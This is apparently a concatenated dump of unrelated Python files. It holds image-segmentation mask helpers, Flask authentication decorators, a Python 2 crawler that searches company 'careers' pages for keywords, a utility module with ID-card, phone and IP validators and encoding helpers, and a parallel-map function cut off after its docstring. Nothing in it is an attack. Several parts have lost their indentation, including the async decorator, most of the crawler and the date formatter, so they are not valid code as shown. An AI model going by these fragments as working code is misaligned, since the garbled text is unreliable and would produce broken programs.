220, 220, 220, 221, 221, 221, 222, 222, 222, 223, 223, 223, 224, 224, 224,
225, 225, 225, 226, 226, 226, 227, 227, 227, 228, 228, 228, 229, 229, 229,
230, 230, 230, 231, 231, 231, 232, 232, 232, 233, 233, 233, 234, 234, 234,
235, 235, 235, 236, 236, 236, 237, 237, 237, 238, 238, 238, 239, 239, 239,
240, 240, 240, 241, 241, 241, 242, 242, 242, 243, 243, 243, 244, 244, 244,
245, 245, 245, 246, 246, 246, 247, 247, 247, 248, 248, 248, 249, 249, 249,
250, 250, 250, 251, 251, 251, 252, 252, 252, 253, 253, 253, 254, 254, 254,
255, 255, 255
]
def label2colormap(label):
    """Map an integer label image (H, W) to an (H, W, 3) uint8 colormap.

    Each RGB channel mixes three bits of the label id (PASCAL-VOC-style
    bit-interleaved palette).
    """
    ids = label.astype(np.uint8)
    rows, cols = ids.shape
    cmap = np.zeros((rows, cols, 3), dtype=np.uint8)
    # red:   bits 0, 3, 6 / green: bits 1, 4, 7 / blue: bits 2, 5
    cmap[:, :, 0] = (ids & 1) << 7 | (ids & 8) << 3 | (ids & 64) >> 1
    cmap[:, :, 1] = (ids & 2) << 6 | (ids & 16) << 2 | (ids & 128) >> 2
    cmap[:, :, 2] = (ids & 4) << 5 | (ids & 32) << 1
    return cmap
def one_hot_mask(mask, cls_num):
    """Convert an integer label mask to float one-hot channels 0..cls_num.

    A 3-D (B, H, W) mask gains a singleton channel dim before comparison.
    """
    if mask.dim() == 3:
        mask = mask.unsqueeze(1)
    # (1, cls_num + 1, 1, 1) class-id grid broadcast against the mask
    class_ids = torch.arange(0, cls_num + 1, device=mask.device).view(1, -1, 1, 1)
    return (mask == class_ids).float()
def masked_image(image, colored_mask, mask, alpha=0.7):
    """Alpha-blend *colored_mask* over *image* where *mask* is foreground.

    image / colored_mask are (3, H, W); mask is (H, W) with > 0 marking
    foreground. Background pixels are returned unchanged.
    """
    fg = np.repeat(np.expand_dims(mask > 0, axis=0), 3, axis=0)
    blended = image * alpha + colored_mask * (1 - alpha)
    return blended * fg + image * (1 - fg)
def save_image(image, path):
    """Save a CHW float image (values in [0, 1]) to *path* as 8-bit RGB."""
    arr = np.uint8(image * 255.).transpose((1, 2, 0))
    Image.fromarray(arr).save(path)
def _save_mask(mask, path, squeeze_idx=None):
    """Write *mask* to *path* as a palettized PNG.

    When *squeeze_idx* is given, compact index i is mapped back to the
    original object id squeeze_idx[i]; index 0 stays background.
    """
    if squeeze_idx is not None:
        restored = mask * 0
        for compact_id in range(1, len(squeeze_idx)):
            original_id = squeeze_idx[compact_id]
            restored += ((mask == compact_id) * original_id).astype(np.uint8)
        mask = restored
    img = Image.fromarray(mask).convert('P')
    img.putpalette(_palette)
    img.save(path)
def save_mask(mask_tensor, path, squeeze_idx=None):
    """Persist a mask tensor as a palettized PNG on a fire-and-forget thread."""
    mask = mask_tensor.cpu().numpy().astype('uint8')
    writer = threading.Thread(target=_save_mask, args=(mask, path, squeeze_idx))
    writer.start()
def flip_tensor(tensor, dim=0):
    """Return *tensor* with the order of elements reversed along *dim*."""
    reversed_idx = torch.arange(tensor.size(dim) - 1, -1, -1,
                                device=tensor.device).long()
    return tensor.index_select(dim, reversed_idx)
def shuffle_obj_mask(mask):
    """Randomly permute the object channels of a (B, N, H, W) mask.

    Channel 0 (background) is kept in place; channels 1..N-1 are shuffled
    independently per batch element.
    """
    batch, obj_num, _, _ = mask.size()
    shuffled = []
    for b in range(batch):
        perm = torch.eye(obj_num, device=mask.device)
        # keep the background row, permute the foreground rows
        perm = torch.cat([perm[0:1], perm[1:][torch.randperm(obj_num - 1)]], dim=0)
        shuffled.append(torch.einsum('nm,nhw->mhw', perm, mask[b]))
    return torch.stack(shuffled, dim=0)
|
decorators.py | from threading import Thread
from functools import wraps
from flask import g, make_response, jsonify
def async(f):
def wrapper(*args, **kwargs):
thr = Thread(target=f, args=args, kwargs=kwargs)
thr.start()
return wrapper
def auth_required(f):
    """Decorator: reject unauthenticated requests with a JSON 403 response."""
    @wraps(f)
    def decorated_function(*args, **kwargs):
        if g.user.is_authenticated():
            return f(*args, **kwargs)
        return make_response(jsonify({'error': 'Unauthorized access'}), 403)
    return decorated_function
|
findJobs.py | import sys, Queue, re, urllib, urlparse, time, os, sys
from threading import Thread
# Module-global set of career-page URLs already visited; getCareers()
# clears it once it exceeds 99999 entries to bound memory use.
dupcheck = set()
def saveCareers(link,key,loc):
print "job match found at ", link
filename="jobs/"
filename+=loc
filename+="-"
filename+=key
if os.path.exists(filename):
append_write='a'
else:
append_write='w'
outfile=open(filename, append_write)
outfile.write(link)
outfile.write("\n")
outfile.close()
def checkListing(link, keyword,loc):
try:
print "career page found at", link
html = urllib.urlopen(link).read()
matches = re.findall(keyword,html,re.I)
if len(matches) != 0:
saveCareers(link,keyword, loc)
except (KeyboardInterrupt, SystemExit):
raise
except Exception:
pass
def getCareers(html, origLink, keyword, loc):
    """Find 'careers' anchors in *html* and check each new target page."""
    for href in re.findall('''<a[^>]+href=["'](.[^"']+)["']>careers</a>''', html, re.I):
        target = href.split("#", 1)[0]
        if not href.startswith("http"):
            # relative link: prefix with the scheme and host of the page it came from
            target = '{uri.scheme}://{uri.netloc}'.format(uri=urlparse.urlparse(origLink)) + target
        if target in dupcheck:
            continue
        dupcheck.add(target)
        if len(dupcheck) > 99999:
            # crude memory bound: forget visit history once it grows too large
            dupcheck.clear()
        checkListing(target, keyword, loc)
def findCareers(link,keyword, loc):
try:
print "crawling", link
html = urllib.urlopen(link).read()
print "page = ", html
getCareers(html, link, keyword, loc)
except (KeyboardInterrupt, SystemExit):
raise
except Exception:
pass
def webCrawl(start_page, job_keyword, loc, threads):
print "spawning thread"
threads.append(Thread( target=findCareers, args=(start_page, job_keyword, loc)))
threads[-1].start()
print "webcrawl return"
|
util.py | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
import base64
import copy
import datetime
import functools
import hashlib
import ipaddr
import json
import logging
import math
import re
import six
import time
import types
import urllib
import uuid
from six import iteritems
logger = logging.getLogger('threathunter_common.util')

__author__ = "nebula"


def md5string(x):
    """Return the hex MD5 digest of *x* (coerced to utf-8 bytes via utf8()).

    Converted from a lambda assignment (PEP 8 E731) to a proper def so it
    has a real __name__ and docstring; callers see the same callable.
    """
    return hashlib.md5(utf8(x)).hexdigest()
def province_filter(province):
    """Strip administrative suffixes (市/省/自治区 variants) from a region name.

    Suffixes are stripped longest-first. The original chained .replace()
    calls removed u"自治区" before u"维吾尔自治区"/u"回族自治区", so those two
    longer suffixes could never match and u"维吾尔"/u"回族" were left behind.
    """
    for suffix in (u"维吾尔自治区", u"回族自治区", u"自治区", u"特别行政区", u"市", u"省"):
        province = province.replace(suffix, '')
    return province
def chunks(listdata, n):
    """
    Author:wxt
    Split *listdata* into up to *n* consecutive slices of (near-)equal size.
    """
    size = int(math.ceil(len(listdata) / float(n)))
    return [listdata[start:start + size] for start in range(0, len(listdata), size)]
def get_root_domain(url):
    """
    Author:wxt
    Return the root (registrable) domain of *url*: the last two
    dot-separated labels of its host part.
    """
    import re
    reg = r'^https?:\/\/([a-z0-9\-\.]+)[\/\?]?'
    m = re.match(reg, url)
    if m:
        uri = m.groups()[0]
    else:
        uri = url
    # Only cut at '/' when one is actually present: str.find() returns -1
    # otherwise, and the original uri[:uri.find('/')] silently dropped the
    # last character of every host without a path (e.g. "test.org" -> "test.or").
    slash = uri.find('/')
    if slash != -1:
        uri = uri[:slash]
    return uri[uri.rfind('.', 0, uri.rfind('.')) + 1:]
def random16bit():
    """
    Author:wxt
    Return a random 16-character uppercase hex string (the first 16 chars
    of md5(uuid4())).

    The uuid string is explicitly encoded before hashing: hashlib.md5()
    requires bytes on Python 3, and encoding an ASCII str is a no-op on
    Python 2, so behavior is unchanged there.
    """
    return hashlib.md5(str(uuid.uuid4()).encode('utf-8')).hexdigest().upper()[:16]
class AttribDict(dict):
    """
    Author:wxt
    Dict whose values can also be read and written via attribute (dot) access.
    >>> foo = AttribDict()
    >>> foo.bar = 1
    >>> foo.bar
    1
    """
    def __init__(self, indict=None, attribute=None):
        if indict is None:
            indict = {}
        # Set any attributes here - before initialisation
        # these remain as normal attributes
        self.attribute = attribute
        dict.__init__(self, indict)
        # Name-mangled flag; once present in __dict__, __setattr__ starts
        # routing unknown attribute names into dict items instead.
        self.__initialised = True
        # After initialisation, setting attributes
        # is the same as setting an item
    def __getattr__(self, item):
        """
        Maps values to attributes
        Only called if there *is NOT* an attribute with this name
        """
        try:
            ret = self.__getitem__(item)
            # Honour the descriptor protocol (e.g. lazy `Get` values).
            if hasattr(ret, '__get__'):
                return ret.__get__(self, AttribDict)
            return ret
        except KeyError:
            # Missing keys read as None instead of raising AttributeError.
            return None
            # raise Exception("unable to access item '%s'" % item)
    def __setattr__(self, item, value):
        """
        Maps attributes to values
        Only if we are initialised
        """
        # This test allows attributes to be set in the __init__ method
        if "_AttribDict__initialised" not in self.__dict__:
            return dict.__setattr__(self, item, value)
        # Any normal attributes are handled normally
        elif item in self.__dict__:
            dict.__setattr__(self, item, value)
        else:
            self.__setitem__(item, value)
    def __getstate__(self):
        # Pickle only the instance __dict__; items travel via dict pickling.
        return self.__dict__
    def __setstate__(self, dict):
        self.__dict__ = dict
    def __deepcopy__(self, memo):
        retVal = self.__class__()
        memo[id(self)] = retVal
        for attr in dir(self):
            if not attr.startswith('_'):
                value = getattr(self, attr)
                # NOTE(review): types.BuiltinFunctionType is listed twice; the
                # second occurrence was probably meant to be BuiltinMethodType.
                if not isinstance(value, (
                        types.BuiltinFunctionType, types.BuiltinFunctionType, types.FunctionType, types.MethodType)):
                    setattr(retVal, attr, copy.deepcopy(value, memo))
        for key, value in self.items():
            retVal.__setitem__(key, copy.deepcopy(value, memo))
        return retVal
def cn_name_match(cn_name):
    """Validate a Chinese personal name: 2-30 CJK characters, with optional
    '·' separators between parts.

    Accepts either utf-8 encoded bytes (the only form the original's
    unconditional ``.decode("utf-8")`` supported) or an already-decoded
    text string, so the function also works on Python 3.
    """
    chre = re.compile(r'^[\u2e80-\ufe4f]+([\u00b7][\u2e80-\ufe4f]+)*$')
    if isinstance(cn_name, bytes):
        cn_name = cn_name.decode("utf-8")
    mat = chre.match(cn_name)
    return bool(mat and 1 < len(cn_name) <= 30)
def ip_match(ip, check_public=False):
    """
    Author: wxt
    Validate a dotted-quad IPv4 address string.
    @param check_public True: additionally require a public (non-loopback,
           non-link-local, non-private) address, via the `ipaddr` package.
    """
    ip_exp = re.compile(
        "^(25[0-5]|2[0-4][0-9]|[0-1]{1}[0-9]{2}|[1-9]{1}[0-9]{1}|[1-9])\.(25[0-5]|2[0-4][0-9]|[0-1]{1}[0-9]{2}|[1-9]{1}[0-9]{1}|[1-9]|0)\.(25[0-5]|2[0-4][0-9]|[0-1]{1}[0-9]{2}|[1-9]{1}[0-9]{1}|[1-9]|0)\.(25[0-5]|2[0-4][0-9]|[0-1]{1}[0-9]{2}|[1-9]{1}[0-9]{1}|[0-9])$")
    if not ip_exp.match(ip):
        return False
    if not check_public:
        return True
    addr = ipaddr.IPAddress(ip)
    return not (addr.is_link_local or addr.is_loopback or addr.is_private)
def mobile_match(mobile):
    """
    Author:wxt
    Validate a mainland-China mobile number: 11 digits starting with a
    known carrier prefix (13x/14x/15x/166/17x/18x/198/199).
    """
    pattern = re.compile("^(13[0-9]|14[01345789]|15[0-9]|16[6]|17[012356789]|18[0-9]|19[89])[0-9]{8}$")
    return bool(pattern.match(mobile))
def identity_card_match(id_number):
    """Validate a Chinese resident ID number (15- or 18-digit form).

    Checks the region/date field layout with a regex; for 18-digit numbers
    additionally verifies the ISO 7064 MOD 11-2 check digit.
    :param id_number: int or str
    :return: Boolean
    """
    if type(id_number) is int:
        id_number = str(id_number)
    if type(id_number) is str:
        try:
            int(id_number[:17])
        except ValueError:
            return False
    regex = r'^(^[1-9]\d{7}((0\d)|(1[0-2]))(([0|1|2]\d)|3[0-1])\d{3}$)|(^[1-9]\d{5}[1-9]\d{3}((0\d)|(1[0-2]))(([0|1|2]\d)|3[0-1])((\d{4})|\d{3}[Xx])$)$'
    if not re.findall(regex, id_number):
        return False
    if len(id_number) == 15:
        return True
    if len(id_number) != 18:
        return False
    # MOD 11-2 checksum over the first 17 digits
    weights = [7, 9, 10, 5, 8, 4, 2, 1, 6, 3, 7, 9, 10, 5, 8, 4, 2]
    check_digits = ['1', '0', 'x', '9', '8', '7', '6', '5', '4', '3', '2']
    total = sum(int(digit) * w for digit, w in zip(id_number[:17], weights))
    return id_number[17:].lower() == check_digits[total % 11]
class I18n(object):
    """
    Author: wxt
    Tiny translation helper: looks *word* up in a word dict and falls back
    to the word itself when no translation exists.

    Fixes: ``dict.has_key()`` (removed in Python 3) replaced by a
    ``dict.get`` lookup, and the mutable default ``word_dict={}`` in
    set_word_dict (one shared dict across all calls) replaced by None.
    """
    default_word_dict = {
        "": "空"
    }

    def __init__(self):
        pass

    def set_word_dict(self, dict_key="", word_dict=None):
        """Register *word_dict* on the instance under attribute *dict_key*."""
        setattr(self, dict_key, {} if word_dict is None else word_dict)

    def translate(self, word, word_dict=None):
        """Translate *word* using word_dict (a dict, a registered dict-key
        string, or falsy for the class default); unknown words pass through."""
        if not word_dict:
            word_dict = self.default_word_dict
        elif not isinstance(word_dict, dict):
            word_dict = getattr(self, word_dict)
        return word_dict.get(word, word)
def curr_timestamp():
    """
    Author: wxt
    Return the current Unix time as a 10-digit integer (whole seconds).
    """
    return int(time.time())
def json_dumps(obj, pretty=False):
    """Serialize *obj* to JSON; pretty=True means sorted keys + 4-space indent."""
    if pretty:
        return json.dumps(obj, sort_keys=True, indent=4, separators=(',', ': '))
    return json.dumps(obj)
def get_system_encoding():
    """Return the canonical codec name of the locale's preferred encoding.

    NOTE(review): the original passed an empty tuple to
    locale.getpreferredencoding(); since a falsy ``do_setlocale`` behaves
    like False, the explicit ``False`` below is behavior-identical and
    makes clear that setlocale() is deliberately not called.
    """
    import codecs
    import locale
    return codecs.lookup(locale.getpreferredencoding(False)).name
class ReadOnlyDict(dict):
    """A Read Only Dict.

    The original only blocked ``__setitem__``; ``update()``, ``pop()``,
    ``setdefault()``, ``del d[k]`` etc. could still mutate the dict.
    All mutating entry points now raise the same exception.
    """

    def _readonly(self, *args, **kwargs):
        # single choke point so every mutator raises the identical error
        raise Exception("dict is read-only")

    __setitem__ = _readonly
    __delitem__ = _readonly
    update = _readonly
    setdefault = _readonly
    pop = _readonly
    popitem = _readonly
    clear = _readonly
def getitem(obj, key=0, default=None):
    """Return obj[key], or *default* when the lookup fails.

    Narrowed from a bare ``except:`` (which also swallowed
    KeyboardInterrupt/SystemExit) to the exceptions a subscript lookup
    actually raises: LookupError (IndexError/KeyError) and TypeError
    for unsubscriptable objects or bad key types.
    """
    try:
        return obj[key]
    except (LookupError, TypeError):
        return default
def hide_me(tb, g=globals()):
    """Hide stack traceback of given stack.

    Skips leading frames until the first one whose globals are *g*, then
    skips the frames belonging to *g*; falls back to the original
    traceback when everything would be hidden or walking fails.
    """
    original = tb
    try:
        while tb and tb.tb_frame.f_globals is not g:
            tb = tb.tb_next
        while tb and tb.tb_frame.f_globals is g:
            tb = tb.tb_next
    except Exception as e:
        logging.exception(e)
        tb = original
    return tb if tb else original
def run_in_thread(func, *args, **kwargs):
    """Run function in a daemon thread; return the started Thread object."""
    from threading import Thread
    worker = Thread(target=func, args=args, kwargs=kwargs)
    worker.daemon = True
    worker.start()
    return worker
def run_in_subprocess(func, *args, **kwargs):
    """Run function in a daemon subprocess; return the started Process object."""
    from multiprocessing import Process
    worker = Process(target=func, args=args, kwargs=kwargs)
    worker.daemon = True
    worker.start()
    return worker
def format_date(date, gmt_offset=0, relative=True, shorter=False, full_format=False):
"""Formats the given date (which should be GMT).
By default, we return a relative time (e.g., "2 minutes ago"). You
can return an absolute date string with ``relative=False``.
You can force a full format date ("July 10, 1980") with
``full_format=True``.
This method is primarily intended for dates in the past.
For dates in the future, we fall back to full format.
From tornado
"""
if not date:
return '-'
if isinstance(date, float) or isinstance(date, int):
date = datetime.datetime.utcfromtimestamp(date)
now = datetime.datetime.utcnow()
if date > now:
if relative and (date - now).seconds < 60:
# Due to click skew, things are some things slightly
# in the future. Round timestamps in the immediate
# future down to now in relative mode.
date = now
else:
# Otherwise, future dates always use the full format.
full_format = True
local_date = date - datetime.timedelta(minutes=gmt_offset)
local_now = now - datetime.timedelta(minutes=gmt_offset)
local_yesterday = local_now - datetime.timedelta(hours=24)
difference = now - date
seconds = difference.seconds
days = difference.days
format = None
if not full_format:
if relative and days == 0:
if seconds < 50:
return ("1 second ago" if seconds <= 1 else
"%(seconds)d seconds ago") % {"seconds": seconds}
if seconds < 50 * 60:
minutes = round(seconds / 60.0)
return ("1 minute ago" if minutes <= 1 else
"%(minutes)d minutes ago") % {"minutes": minutes}
hours = round(seconds / (60.0 * 60))
return ("1 hour ago" if hours <= 1 else
"%(hours)d hours ago") % {"hours": hours}
if days == 0:
format = "%(time)s"
elif days == 1 and local_date.day == local_yesterday.day and \
relative:
format = "yesterday" if shorter else "yesterday at %(time)s"
elif days < 5:
format = "%(weekday)s" if shorter else "%(weekday)s at %(time)s"
elif days < 334: # 11mo, since confusing for same month last year
format = "%(month_name)s-%(day)s" if shorter else \
"%(month_name)s-%(day)s at %(time)s"
if format is None:
format = "%(month_name)s %(day)s, %(year)s" if shorter else \
"%(month_name)s %(day)s, %(year)s at %(time)s"
str_time = "%d:%02d" % (local_date.hour, local_date.minute)
return format % {
"month_name": local_date.month - 1,
"weekday": local_date.weekday(),
"day": str(local_date.day),
"year": str(local_date.year),
"time": str_time
}
class TimeoutError(Exception):
    """Raised by the `timeout` context manager when the alarm fires.

    NOTE(review): shadows the builtin TimeoutError on Python >= 3.3;
    kept as-is because callers catch this module-level name.
    """
    pass
try:
    import signal
    # SIGALRM exists only on POSIX; elsewhere fall through to the no-op class.
    if not hasattr(signal, 'SIGALRM'):
        raise ImportError('signal')
    class timeout:
        """
        Time limit of command
        with timeout(3):
            time.sleep(10)
        """
        def __init__(self, seconds=1, error_message='Timeout'):
            # seconds falsy (0/None) disables the alarm entirely
            self.seconds = seconds
            self.error_message = error_message
        def handle_timeout(self, signum, frame):
            # SIGALRM handler: abort the guarded block via TimeoutError
            raise TimeoutError(self.error_message)
        def __enter__(self):
            if self.seconds:
                signal.signal(signal.SIGALRM, self.handle_timeout)
                signal.alarm(self.seconds)
        def __exit__(self, type, value, traceback):
            if self.seconds:
                # cancel any pending alarm on exit (normal or exceptional)
                signal.alarm(0)
except ImportError:
    class timeout:
        """
        Time limit of command (for windows)
        No-op fallback where SIGALRM is unavailable: the body runs unbounded.
        """
        def __init__(self, seconds=1, error_message='Timeout'):
            pass
        def __enter__(self):
            pass
        def __exit__(self, type, value, traceback):
            pass
def utf8(string):
    """
    Make sure string is utf8 encoded bytes.
    If parameter is a object, object.__str__ will been called before encode as bytes
    """
    if string is None:
        return string
    if isinstance(string, six.text_type):
        return string.encode('utf8')
    elif isinstance(string, six.binary_type):
        return string
    elif isinstance(string, bytearray):
        return six.binary_type(string)
    else:
        # six.text_type instead of the py2-only unicode() builtin, matching
        # how text() in this module already handles the fallback case
        return six.text_type(string).encode('utf8')
def binary_data(string):
    """
    Make sure the result is a bytearray.
    If parameter is a object, object.__str__ will been called before encode as bytes
    """
    if string is None:
        return string
    if isinstance(string, six.text_type):
        return bytearray(string.encode('utf8'))
    elif isinstance(string, six.binary_type):
        return bytearray(string)
    elif isinstance(string, bytearray):
        return string
    else:
        # six.text_type instead of the py2-only unicode() builtin, for
        # consistency with text()/utf8() in this module
        return bytearray(six.text_type(string).encode('utf8'))
def text(string, encoding='utf8'):
    """Coerce *string* to unicode text, decoding bytes with *encoding*.

    None passes through; other objects are converted via their __str__.
    """
    if string is None:
        return string
    if isinstance(string, six.text_type):
        return string
    if isinstance(string, six.binary_type):
        return string.decode(encoding)
    if isinstance(string, bytearray):
        return six.binary_type(string).decode(encoding)
    return six.text_type(string)
def pretty_unicode(string):
    """
    Make sure string is unicode, try to decode with utf8, or unicode escaped string if failed.
    """
    if isinstance(string, six.text_type):
        return string
    try:
        return string.decode("utf8")
    except UnicodeDecodeError:
        # Latin-1 maps every byte, so this cannot fail; escape the result
        # so the caller always gets something printable.
        # NOTE(review): on py3 the .encode() returns bytes, not text.
        return string.decode('Latin-1').encode('unicode_escape')
def unicode_string(string):
    """
    Make sure string is unicode, try to default with utf8, or base64 if failed.
    can been decode by `decode_unicode_string`
    """
    if string is None:
        return string
    if isinstance(string, six.text_type):
        return string
    try:
        return string.decode("utf8")
    except UnicodeDecodeError:
        # Undecodable bytes are wrapped so they survive a text round-trip.
        # NOTE(review): on py3, b64encode returns bytes and this concatenation
        # would raise TypeError - this branch assumes py2 str semantics.
        return '[BASE64-DATA]' + base64.b64encode(string) + '[/BASE64-DATA]'
def unicode_dict(_dict):
    """
    Make sure keys and values of dict is unicode.
    """
    return {unicode_string(k): unicode_obj(v) for k, v in iteritems(_dict)}
def unicode_list(_list):
    """
    Make sure every element in list is unicode. bytes will encode in base64
    """
    return list(map(unicode_obj, _list))
def unicode_obj(obj):
    """
    Make sure keys and values of dict/list/tuple is unicode. bytes will encode in base64.
    Can been decode by `decode_unicode_obj`

    Dead branches removed from the original: a duplicate ``obj is None``
    check (None already returned at the top) and an ``elif (int, float)``
    arm that returned obj exactly like the final else did.
    """
    if obj is None:
        return obj
    if isinstance(obj, dict):
        return unicode_dict(obj)
    if isinstance(obj, (list, tuple)):
        return unicode_list(obj)
    if isinstance(obj, six.string_types):
        return unicode_string(obj)
    # ints, floats and anything else pass through unchanged
    return obj
def decode_unicode_string(string):
    """
    Decode string encoded by `unicode_string`
    """
    prefix, suffix = '[BASE64-DATA]', '[/BASE64-DATA]'
    if string.startswith(prefix) and string.endswith(suffix):
        return base64.b64decode(string[len(prefix):-len(suffix)])
    return string
def decode_unicode_obj(obj):
    """
    Decode unicoded dict/list/tuple encoded by `unicode_obj`
    """
    if isinstance(obj, six.string_types):
        return decode_unicode_string(obj)
    if isinstance(obj, dict):
        return {decode_unicode_string(k): decode_unicode_obj(v)
                for k, v in iteritems(obj)}
    if isinstance(obj, (list, tuple)):
        return [decode_unicode_obj(x) for x in obj]
    return obj
class Get(object):
    """
    Lazy value calculate for object: wraps a zero-argument callable as a
    descriptor, so each attribute read invokes the callable afresh.
    """
    def __init__(self, getter):
        # getter: zero-argument callable producing the value on every access
        self.getter = getter
    def __get__(self, instance, owner):
        return self.getter()
class ObjectDict(dict):
    """
    Object like dict, every dict[key] can visite by dict.key
    If dict[key] is `Get`, calculate it's value.
    """
    def __getattr__(self, name):
        value = self[name]
        # honour the descriptor protocol for lazy `Get` values
        if hasattr(value, '__get__'):
            return value.__get__(self, ObjectDict)
        return value
def load_object(name):
    """Load an object from a module given a dotted "module.object" path.

    Uses importlib.import_module, which returns the leaf module exactly
    like the original ``__import__(..., fromlist=[...])`` call did, but
    works identically on Python 2 and 3 and drops the six/utf8 special-
    casing of the fromlist entry.

    Raises Exception when *name* contains no dot.
    """
    if "." not in name:
        raise Exception('load object need module.object')
    module_name, object_name = name.rsplit('.', 1)
    import importlib
    module = importlib.import_module(module_name)
    return getattr(module, object_name)
def get_python_console(namespace=None):
    """
    Return a interactive python console instance with caller's stack.

    When *namespace* is None, the globals and locals of the direct caller
    are captured, so the console sees the caller's variables.
    """
    if namespace is None:
        import inspect
        frame = inspect.currentframe()
        # one frame up = whoever called this function
        caller = frame.f_back
        if not caller:
            logging.error("can't find caller who start this console.")
            caller = frame
        namespace = dict(caller.f_globals)
        namespace.update(caller.f_locals)
    try:
        # Prefer a full IPython shell when the package is installed.
        from IPython.terminal.interactiveshell import TerminalInteractiveShell
        shell = TerminalInteractiveShell(user_ns=namespace)
    except ImportError:
        try:
            # Plain-console fallback: enable tab completion when readline exists.
            import readline
            import rlcompleter
            readline.set_completer(rlcompleter.Completer(namespace).complete)
            readline.parse_and_bind("tab: complete")
        except ImportError:
            pass
        import code
        shell = code.InteractiveConsole(namespace)
        shell._quit = False
        def exit():
            # flag checked by readfunc so the next prompt raises EOFError
            shell._quit = True
        def readfunc(prompt=""):
            if shell._quit:
                raise EOFError
            return six.moves.input(prompt)
        # inject exit method
        shell.ask_exit = exit
        shell.raw_input = readfunc
    return shell
def python_console(namespace=None):
    """Start a interactive python console with caller's stack.

    Captures the direct caller's globals/locals (when *namespace* is None)
    and blocks in the console's interact() loop until the user exits.
    """
    if namespace is None:
        import inspect
        frame = inspect.currentframe()
        # one frame up = whoever called python_console()
        caller = frame.f_back
        if not caller:
            logging.error("can't find caller who start this console.")
            caller = frame
        namespace = dict(caller.f_globals)
        namespace.update(caller.f_locals)
    return get_python_console(namespace=namespace).interact()
def millis_now():
    """Return the current Unix time in integer milliseconds (truncated)."""
    return int(time.time() * 1000)
def gen_uuid():
    """Return a 12-char lowercase-hex id: the node field of a random UUID4."""
    # .hex[-12:] equals str(uuid4())[-12:], the part after the last dash
    return uuid.uuid4().hex[-12:]
def asciifyUrl(url, forceQuote=False):
    """
    Attempts to make a unicode URL usuable with ``urllib/urllib2``.
    More specifically, it attempts to convert the unicode object ``url``,
    which is meant to represent a IRI, to an unicode object that,
    containing only ASCII characters, is a valid URI. This involves:
    * IDNA/Puny-encoding the domain name.
    * UTF8-quoting the path and querystring parts.
    See also RFC 3987.
    Reference: http://blog.elsdoerfer.name/2008/12/12/opening-iris-in-python/
    >>> asciifyUrl(u'http://www.\u0161u\u0107uraj.com')
    u'http://www.xn--uuraj-gxa24d.com'
    """
    import urlparse  # py2-only module; NOTE(review): urllib.parse on py3
    parts = urlparse.urlsplit(url)
    if not parts.scheme or not parts.netloc:
        # apparently not an url
        return url
    # idna-encode domain
    hostname = parts.hostname.encode("idna")
    # UTF8-quote the other parts. We check each part individually if
    # if needs to be quoted - that should catch some additional user
    # errors, say for example an umlaut in the username even though
    # the path *is* already quoted.
    def quote(s, safe, forceQuote=False):
        s = s or ''
        # Triggers on non-ascii characters - another option would be:
        # urllib.quote(s.replace('%', '')) != s.replace('%', '')
        # which would trigger on all %-characters, e.g. "&".
        if s.encode("ascii", "replace") != s or forceQuote:
            return urllib.quote(s.encode('utf8'), safe=safe)
        return s
    username = quote(parts.username, '')
    password = quote(parts.password, safe='')
    path = quote(parts.path, safe='/')
    # query always gets re-quoted, but with separators kept intact
    query = quote(parts.query, safe="&=;/", forceQuote=True)
    # put everything back together
    netloc = hostname
    if username or password:
        # rebuild the userinfo section: username[:password]@host
        netloc = '@' + netloc
        if password:
            netloc = ':' + password + netloc
        netloc = username + netloc
    if parts.port:
        netloc += ':' + str(parts.port)
    return urlparse.urlunsplit([parts.scheme, netloc, path, query, parts.fragment])
def simweb(url, data=None, is_json=False, timeout=5):
    """
    Simple HTTP fetch helper (Python 2 urllib2).

    :param url: request URL (IRIs are asciified via asciifyUrl first)
    :param data: if truthy, send a POST with this payload instead of a GET
    :param is_json: if True, json.dumps(data) before posting
    :param timeout: socket timeout in seconds
    :return: (source, code) tuple, or (None, None) on any error
    """
    try:
        import urllib2  # py2-only; NOTE(review): urllib.request on py3
        opener = urllib2.build_opener()
        url = asciifyUrl(url)
        if data:
            if is_json:
                data = json.dumps(data)
            # presence of a body makes urllib2 issue a POST
            Req = urllib2.Request(url, data)
            Req.add_header('Content-type', "application/x-www-form-urlencoded")
        else:
            Req = urllib2.Request(url)
        Res = opener.open(Req, timeout=timeout)
        source = Res.read()
        code = Res.getcode()
        return source, code
    except Exception as e:
        # deliberate best-effort: any failure (DNS, timeout, HTTP error)
        # is logged and reported as (None, None)
        logger.warn("Http Request Error:%s", e)
        return None, None
def elapsed(logger=None, verbose="elapsed time: %f s"):
    """Decorator factory: report how long each call of the wrapped function took.

    If *logger* is given the message goes to logger.debug, otherwise it is
    printed. *verbose* must contain one ``%f`` placeholder (seconds).

    Usage (note the parentheses - the factory must be called):

        @elapsed()
        def fun():
            pass

    Fix over the original: the wrapper now returns the wrapped function's
    result (it was silently discarded, so every decorated function
    returned None); the unused ``msecs`` variable was dropped.
    """
    def _elapsed(func):
        @functools.wraps(func)
        def _wrapper(*args, **kw):
            start = time.time()
            result = func(*args, **kw)
            secs = time.time() - start
            if logger:
                logger.debug(verbose % secs)
            else:
                print(verbose % secs)
            return result
        return _wrapper
    return _elapsed
|
performance.py | # -*- coding: utf-8 -*-
import numpy as np
import warnings
import multiprocessing as mp
def pmap(function, *arguments, **kwargs):
    """
    Parallelized version of map. It calls function on arguments using numprocesses threads.
    Also try the numexpr package or numba, which are easy to use and may give you better
    performance.
    Parameters
    ----------
    function : function
        The function to call.
    arguments : sequence(s)
        One or more sequences, which are passed to the function. If N sequences are
        provided, function is called with N arguments.
    numprocesses : int, optional (default = None)
        The number of processes to keep busy. If None, the number of CPUs is used.
    nchunks: int, optional (default = None)
        The number of chunks in which the arguments are split.
        By default this is set to the number of processes, but sometimes you want
        fewer chunks, so that they do not become too short.
    Returns
    -------
    results : list or ndarray
        The values returned by the function calls, as would be done by
        map(function, *arguments). The order of the results matches the input
        order. If the first of arguments is an ndarray, the result is converted
        to an ndarray.
    Notes
    -----
    Uses multiprocessing queues to create parallel version of map.
    Note that, for pmap to be useful, the function itself (applied on one input) should be time consuming and hard to optimize.
    Pmap is not beneficial in case of a cheap function and huge number of inputs.
    In this case it is much better to run the function in a lower level, e.g. via numpy vectorization.
    Limitations
    -----------
    The function needs to be a pure function, which means that
    it may not manipulate a shared global state during its calls.
    For example, you cannot use a function that computes a sum over the arguments.
    Examples
    --------
    >>> def f(x): return x*x
    >>> pmap(f, (1, 2, 3))
    [1, 4, 9]
    See Also
    --------
    multiprocessing
    """
    # NOTE(review): assert-based validation is stripped under `python -O`.
